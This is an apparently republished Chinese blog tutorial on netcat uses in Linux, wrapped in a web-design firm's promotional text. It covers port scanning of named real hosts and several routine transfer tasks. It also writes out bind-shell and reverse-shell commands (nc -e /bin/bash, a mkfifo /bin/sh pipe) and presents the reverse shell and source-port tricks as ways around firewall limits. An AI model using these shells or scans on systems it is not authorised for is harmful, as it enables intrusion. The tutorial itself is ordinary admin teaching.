這期內(nèi)容當(dāng)中小編將會給大家?guī)碛嘘P(guān)netcat命令怎么在Linux系統(tǒng)中使用,文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。
10年積累的網(wǎng)站建設(shè)、做網(wǎng)站經(jīng)驗(yàn),可以快速應(yīng)對客戶對網(wǎng)站的新想法和需求。提供各種問題對應(yīng)的解決方案。讓選擇我們的客戶得到更好、更有力的網(wǎng)絡(luò)服務(wù)。我雖然不認(rèn)識你,你也不認(rèn)識我。但先建設(shè)網(wǎng)站后付款的網(wǎng)站建設(shè)流程,更有臺州免費(fèi)網(wǎng)站建設(shè)讓你可以放心的選擇與我們合作。1,端口掃描
如果未安裝 nmap,試試 nc/netcat 命令,如下所示。-z 參數(shù)用來告訴 nc 報(bào)告開放的端口,而不是啟動(dòng)連接。在 nc 命令中使用 -z 參數(shù)時(shí),你需要在主機(jī)名/ip 后面限定端口的范圍和加速其運(yùn)行:
代碼如下:
### 語法 ###
### nc -z -v {host-name-here} {port-range-here}
nc -z -v host-name-here ssh
nc -z -v host-name-here 22
nc -w 1 -z -v server-name-here port-Number-her
### 掃描 1 to 1023 端口 ###
nc -zv vip-1.vsnl.nixcraft.in 1-1023
輸出示例:
代碼如下:
Connection to localhost 25 port [tcp/smtp] succeeded!
Connection to vip-1.vsnl.nixcraft.in 25 port [tcp/smtp] succeeded!
Connection to vip-1.vsnl.nixcraft.in 80 port [tcp/http] succeeded!
Connection to vip-1.vsnl.nixcraft.in 143 port [tcp/imap] succeeded!
Connection to vip-1.vsnl.nixcraft.in 199 port [tcp/smux] succeeded!
Connection to vip-1.vsnl.nixcraft.in 783 port [tcp/*] succeeded!
Connection to vip-1.vsnl.nixcraft.in 904 port [tcp/vmware-authd] succeeded!
Connection to vip-1.vsnl.nixcraft.in 993 port [tcp/imaps] succeeded!
你也可以掃描單個(gè)端口:
代碼如下:
nc -zv v.txvip1 443
nc -zv v.txvip1 80
nc -zv v.txvip1 22
nc -zv v.txvip1 21
nc -zv v.txvip1 smtp
nc -zvn v.txvip1 ftp
### 使用1秒的超時(shí)值來更快的掃描 ###
netcat -v -z -n -w 1 v.txvip1 1-1023
輸出示例:
-z : 端口掃描模式即零 I/O 模式。
-v : 顯示詳細(xì)信息 [使用 -vv 來輸出更詳細(xì)的信息]。
-n : 使用純數(shù)字 IP 地址,即不用 DNS 來解析 IP 地址。
-w 1 : 設(shè)置超時(shí)值設(shè)置為1。
更多例子:
代碼如下:
$ netcat -z -vv www.cyberciti.biz http
www.cyberciti.biz [75.126.153.206] 80 (http) open
sent 0, rcvd 0
$ netcat -z -vv google.com https
DNS fwd/rev mismatch: google.com != maa03s16-in-f2.1e100.net
DNS fwd/rev mismatch: google.com != maa03s16-in-f6.1e100.net
DNS fwd/rev mismatch: google.com != maa03s16-in-f5.1e100.net
DNS fwd/rev mismatch: google.com != maa03s16-in-f3.1e100.net
DNS fwd/rev mismatch: google.com != maa03s16-in-f8.1e100.net
DNS fwd/rev mismatch: google.com != maa03s16-in-f0.1e100.net
DNS fwd/rev mismatch: google.com != maa03s16-in-f7.1e100.net
DNS fwd/rev mismatch: google.com != maa03s16-in-f4.1e100.net
google.com [74.125.236.162] 443 (https) open
sent 0, rcvd 0
$ netcat -v -z -n -w 1 192.168.1.254 1-1023
(UNKNOWN) [192.168.1.254] 989 (ftps-data) open
(UNKNOWN) [192.168.1.254] 443 (https) open
(UNKNOWN) [192.168.1.254] 53 (domain) open
2.Chat Server
假如你想和你的朋友聊聊,有很多的軟件和信息服務(wù)可以供你使用。但是,如果你沒有這么奢侈的配置,比如你在計(jì)算機(jī)實(shí)驗(yàn)室,所有的對外的連接都是被限制的,你怎樣和整天坐在隔壁房間的朋友溝通那?不要郁悶了,netcat提供了這樣一種方法,你只需要?jiǎng)?chuàng)建一個(gè)Chat服務(wù)器,一個(gè)預(yù)先確定好的端口,這樣子他就可以聯(lián)系到你了。
Server
代碼如下:
$nc -l 1567
netcat 命令在1567端口啟動(dòng)了一個(gè)tcp 服務(wù)器,所有的標(biāo)準(zhǔn)輸出和輸入會輸出到該端口。輸出和輸入都在此shell中展示。
Client
代碼如下:
$nc 172.31.100.7 1567
不管你在機(jī)器B上鍵入什么都會出現(xiàn)在機(jī)器A上。
3,文件傳輸
假設(shè)兩個(gè)服務(wù)器的IP分別是[A(172.31.100.7) B(172.31.100.23)]
大部分時(shí)間中,我們都在試圖通過網(wǎng)絡(luò)或者其他工具傳輸文件。有很多種方法,比如FTP,SCP,SMB等等,但是當(dāng)你只是需要臨時(shí)或者一次傳輸文件,真的值得浪費(fèi)時(shí)間來安裝配置一個(gè)軟件到你的機(jī)器上嘛。假設(shè),你想要傳一個(gè)文件file.txt 從A 到B。A或者B都可以作為服務(wù)器或者客戶端,以下,讓A作為服務(wù)器,B為客戶端。
Server
代碼如下:
$nc -l 1567 < file.txt
Client
代碼如下:
$nc -n 172.31.100.7 1567 > file.txt
這里我們創(chuàng)建了一個(gè)服務(wù)器在A上并且重定向netcat的輸入為文件file.txt,那么當(dāng)任何成功連接到該端口,netcat會發(fā)送file的文件內(nèi)容。
在客戶端我們重定向輸出到file.txt,當(dāng)B連接到A,A發(fā)送文件內(nèi)容,B保存文件內(nèi)容到file.txt.
沒有必要?jiǎng)?chuàng)建文件源作為Server,我們也可以相反的方法使用。像下面的我們發(fā)送文件從B到A,但是服務(wù)器創(chuàng)建在A上,這次我們僅需要重定向netcat的輸出并且重定向B的輸入文件。
B作為Server
Server
代碼如下:
$nc -l 1567 > file.txt
Client
代碼如下:
nc 172.31.100.23 1567 < file.txt
4,目錄傳輸
發(fā)送一個(gè)文件很簡單,但是如果我們想要發(fā)送多個(gè)文件,或者整個(gè)目錄,一樣很簡單,只需要使用壓縮工具tar,壓縮后發(fā)送壓縮包。
如果你想要通過網(wǎng)絡(luò)傳輸一個(gè)目錄從A到B。
Server
代碼如下:
$tar -cvf – dir_name | nc -l 1567
Client
代碼如下:
$nc -n 172.31.100.7 1567 | tar -xvf -
這里在A服務(wù)器上,我們創(chuàng)建一個(gè)tar歸檔包并且通過-在控制臺重定向它,然后使用管道,重定向給netcat,netcat可以通過網(wǎng)絡(luò)發(fā)送它。
在客戶端我們下載該壓縮包通過netcat 管道然后打開文件。
如果想要節(jié)省帶寬傳輸壓縮包,我們可以使用bzip2或者其他工具壓縮。
Server
代碼如下:
$tar -cvf – dir_name| bzip2 -z | nc -l 1567
通過bzip2壓縮
Client
代碼如下:
$nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf -
使用bzip2解壓
5. 加密你通過網(wǎng)絡(luò)發(fā)送的數(shù)據(jù)
如果你擔(dān)心你在網(wǎng)絡(luò)上發(fā)送數(shù)據(jù)的安全,你可以在發(fā)送你的數(shù)據(jù)之前用如mcrypt的工具加密。
服務(wù)端
代碼如下:
$nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
使用mcrypt工具加密數(shù)據(jù)。
客戶端
代碼如下:
$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567
使用mcrypt工具解密數(shù)據(jù)。
以上兩個(gè)命令會提示需要密碼,確保兩端使用相同的密碼。
這里我們是使用mcrypt用來加密,使用其它任意加密工具都可以。
6. 流視頻
雖然不是生成流視頻的好方法,但如果服務(wù)器上沒有特定的工具,使用netcat,我們?nèi)匀挥邢M龀蛇@件事。
服務(wù)端
代碼如下:
$cat video.avi | nc -l 1567
這里我們只是從一個(gè)視頻文件中讀入并重定向輸出到netcat客戶端
代碼如下:
$nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -
這里我們從socket中讀入數(shù)據(jù)并重定向到mplayer。
7,克隆一個(gè)設(shè)備
如果你已經(jīng)安裝配置一臺Linux機(jī)器并且需要重復(fù)同樣的操作對其他的機(jī)器,而你不想在重復(fù)配置一遍。不在需要重復(fù)配置安裝的過程,只啟動(dòng)另一臺機(jī)器的一些引導(dǎo)可以隨身碟和克隆你的機(jī)器。
克隆Linux PC很簡單,假如你的系統(tǒng)在磁盤/dev/sda上
Server
代碼如下:
$dd if=/dev/sda | nc -l 1567
Client
代碼如下:
$nc -n 172.31.100.7 1567 | dd of=/dev/sda
dd是一個(gè)從磁盤讀取原始數(shù)據(jù)的工具,我通過netcat服務(wù)器重定向它的輸出流到其他機(jī)器并且寫入到磁盤中,它會隨著分區(qū)表拷貝所有的信息。但是如果我們已經(jīng)做過分區(qū)并且只需要克隆root分區(qū),我們可以根據(jù)我們系統(tǒng)root分區(qū)的位置,更改sda 為sda1,sda2.等等。
8,打開一個(gè)shell
我們已經(jīng)用過遠(yuǎn)程shell-使用telnet和ssh,但是如果這兩個(gè)命令沒有安裝并且我們沒有權(quán)限安裝他們,我們也可以使用netcat創(chuàng)建遠(yuǎn)程shell。
假設(shè)你的netcat支持 -c -e 參數(shù)(默認(rèn) netcat)
Server
代碼如下:
$nc -l 1567 -e /bin/bash -i
Client
代碼如下:
$nc 172.31.100.7 1567
這里我們已經(jīng)創(chuàng)建了一個(gè)netcat服務(wù)器并且表示當(dāng)它連接成功時(shí)執(zhí)行/bin/bash
假如netcat 不支持-c 或者 -e 參數(shù)(openbsd netcat),我們?nèi)匀荒軌騽?chuàng)建遠(yuǎn)程shell
Server
代碼如下:
$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo
這里我們創(chuàng)建了一個(gè)fifo文件,然后使用管道命令把這個(gè)fifo文件內(nèi)容定向到shell 2>&1中。是用來重定向標(biāo)準(zhǔn)錯(cuò)誤輸出和標(biāo)準(zhǔn)輸出,然后管道到netcat 運(yùn)行的端口1567上。至此,我們已經(jīng)把netcat的輸出重定向到fifo文件中。
說明:
從網(wǎng)絡(luò)收到的輸入寫到fifo文件中
cat 命令讀取fifo文件并且其內(nèi)容發(fā)送給sh命令
sh命令進(jìn)程受到輸入并把它寫回到netcat。
netcat 通過網(wǎng)絡(luò)發(fā)送輸出到client
至于為什么會成功是因?yàn)楣艿朗姑钇叫袌?zhí)行,fifo文件用來替代正常文件,因?yàn)閒ifo使讀取等待而如果是一個(gè)普通文件,cat命令會盡快結(jié)束并開始讀取空文件。
在客戶端僅僅簡單連接到服務(wù)器
Client
代碼如下:
$nc -n 172.31.100.7 1567
你會得到一個(gè)shell提示符在客戶端
9.反向shell
反向shell是指在客戶端打開的shell。反向shell這樣命名是因?yàn)椴煌谄渌渲?,這里服務(wù)器使用的是由客戶提供的服務(wù)。
服務(wù)端
代碼如下:
$nc -l 1567
在客戶端,簡單地告訴netcat在連接完成后,執(zhí)行shell。
客戶端
代碼如下:
$nc 172.31.100.7 1567 -e /bin/bash
現(xiàn)在,什么是反向shell的特別之處呢
反向shell經(jīng)常被用來繞過防火墻的限制,如阻止入站連接。例如,我有一個(gè)專用IP地址為172.31.100.7,我使用代理服務(wù)器連接到外部網(wǎng)絡(luò)。如果我想從網(wǎng)絡(luò)外部訪問 這臺機(jī)器如1.2.3.4的shell,那么我會用反向外殼用于這一目的。
10. 指定源端口
假設(shè)你的防火墻過濾除25端口外其它所有端口,你需要使用-p選項(xiàng)指定源端口。
服務(wù)器端
代碼如下:
$nc -l 1567
客戶端
代碼如下:
$nc 172.31.100.7 1567 -p 25
使用1024以內(nèi)的端口需要root權(quán)限。
該命令將在客戶端開啟25端口用于通訊,否則將使用隨機(jī)端口。
11. 指定源地址
假設(shè)你的機(jī)器有多個(gè)地址,希望明確指定使用哪個(gè)地址用于外部數(shù)據(jù)通訊。我們可以在netcat中使用-s選項(xiàng)指定ip地址。
服務(wù)器端
代碼如下:
$nc -u -l 1567 < file.txt
客戶端
代碼如下:
$nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txt
該命令將綁定地址172.31.100.5。
這僅僅是使用netcat的一些示例。
其它用途有:
使用-t選項(xiàng)模擬Telnet客戶端,
HTTP客戶端用于下載文件,
連接到郵件服務(wù)器,使用SMTP協(xié)議檢查郵件,
使用ffmpeg截取屏幕并通過流式傳輸分享,等等。其它更多用途。
上述就是小編為大家分享的netcat命令怎么在Linux系統(tǒng)中使用了,如果剛好有類似的疑惑,不妨參照上述分析進(jìn)行理解。如果想知道更多相關(guān)知識,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。
標(biāo)題名稱:netcat命令怎么在Linux系統(tǒng)中使用-創(chuàng)新互聯(lián)
當(dāng)前URL:http://www.rwnh.cn/article46/dgsihg.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供外貿(mào)建站、Google、云服務(wù)器、網(wǎng)站改版、網(wǎng)站營銷、網(wǎng)站策劃
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容